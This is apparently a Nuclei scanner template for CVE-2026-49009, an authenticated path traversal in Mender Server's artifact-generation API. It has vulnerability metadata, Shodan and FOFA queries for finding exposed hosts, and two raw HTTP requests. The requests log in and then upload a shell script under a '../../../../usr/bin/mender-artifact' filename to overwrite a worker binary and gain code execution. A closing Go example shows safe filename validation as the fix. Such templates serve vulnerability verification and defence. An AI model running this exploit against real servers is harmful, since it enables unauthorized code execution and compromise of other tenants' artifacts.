id: CVE-2026-49009

info:
  name: Mender Server - Authenticated Path Traversal to RCE
  author: j0xh-sec, inteleon404
  severity: critical
  description: |
    Mender Server versions 4.1.0, 4.0.1, and below are vulnerable to an authenticated path traversal in the single-file artifact generation API endpoint. An attacker with a valid user account can supply a filename containing `../` traversal sequences (e.g. `../../../../usr/bin/mender-artifact`), causing the uploaded file payload to be written outside the intended directory. When the create-artifact-worker workflow later invokes the overwritten binary, the attacker's injected command is executed within the worker container, achieving remote code execution.
    The flaw was fixed in Mender Server 4.1.1 (stable) and 4.0.2 (LTS) by hardening input validation in the single-file generation handler.
  impact: |
    Successful exploitation gives an authenticated attacker remote code execution inside the create-artifact-worker container. In multi-tenant Hosted Mender environments this can compromise artifacts belonging to other organizations sharing the same infrastructure.
  remediation: |
    Upgrade to Mender Server 4.1.1, 4.0.2, or later. Affected versions include all releases prior to and including 4.1.0 and 4.0.1 for both Mender Server Community (Open Source) and Mender Server Enterprise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-49009
    - https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server
    - https://app.opencve.io/cve/CVE-2026-49009
    - https://www.tenable.com/cve/CVE-2026-49009
    - https://docs.mender.io/release-information/release-notes-changelog/mender-server
    - https://docs.mender.io/release-information/release-notes-changelog/mender-server-enterprise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2026-49009
    cwe-id: CWE-22
    epss-score: 0.00180
    epss-percentile: 0.59645
    cpe: cpe:2.3:a:northern.tech:mender_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: northern.tech
    product: mender_server
    shodan-query: http.title:"Mender"
    fofa-query: app="Mender"
  tags: cve,cve2026,mender,path-traversal,rce,authenticated,intrusive

http:
  - raw:
      - |+
        POST /api/management/v1/useradm/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64('{{username}}:{{password}}')}}

        {}

      - |+
        POST /api/management/v1/deployments/artifacts/generate HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{jwt}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        cve-poc-{{randhex_6}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="description"

        CVE-2026-49009 verification
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="type"

        single-file
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="device_types_compatible"

        qemu
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="args"
        Content-Type: application/json

        {"filename":"../../../../usr/bin/mender-artifact","dest_dir":"/opt/mender/app","software_name":"demo","software_version":"1"}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="file"; filename="payload.sh"
        Content-Type: application/octet-stream

        #!/bin/sh
        /usr/bin/id>/tmp/.cve-2026-49009
        ------WebKitFormBoundary{{randstr}}--

    extractors:
      - type: regex
        name: jwt
        part: body
        internal: true
        regex:
          - "([A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+)"

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'len(jwt) > 100'
          - 'status_code_2 >= 200 && status_code_2 < 300'
          - 'contains(to_string(header_2_all), "Location")'
        condition: and
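
The description attributes the bug to a client-supplied `filename` whose `../` sequences let the upload be written outside the intended directory. The following Go code is an added example, not Mender's code or its actual patch: it contrasts a plain `filepath.Join` with a handler-side check that allows only a bare file name and then verifies containment. `naiveJoin`, `safeJoin`, `ErrUnsafeName`, the bare-name policy and the staging directory are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeName marks a client-supplied name that must not be written.
var ErrUnsafeName = errors.New("file name escapes staging directory")

// naiveJoin models the unsafe pattern: Join cleans the result, so "../"
// segments are resolved and the path can leave baseDir.
func naiveJoin(baseDir, name string) string {
	return filepath.Join(baseDir, name)
}

// safeJoin accepts only a bare file name (assumed policy), then confirms
// the joined path is still inside baseDir as a second, independent check.
func safeJoin(baseDir, name string) (string, error) {
	if name == "" || name == "." || name == ".." ||
		strings.ContainsAny(name, "/\\\x00") {
		return "", ErrUnsafeName
	}
	full := filepath.Join(baseDir, name)
	rel, err := filepath.Rel(baseDir, full)
	if err != nil || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrUnsafeName
	}
	return full, nil
}

func main() {
	base := "/srv/worker/job-1" // constructed staging directory (hypothetical)
	names := []string{
		"update.bin",
		"../../../../usr/bin/mender-artifact", // filename from the template
		"/etc/hostname",
		"sub/dir/file",
	}
	for _, n := range names {
		p, err := safeJoin(base, n)
		fmt.Printf("%q naive=%s safe=%q err=%v\n", n, naiveJoin(base, n), p, err)
	}
}
```

Rejecting the name at the API boundary, before anything is queued for the worker, keeps the traversal string out of every later file operation.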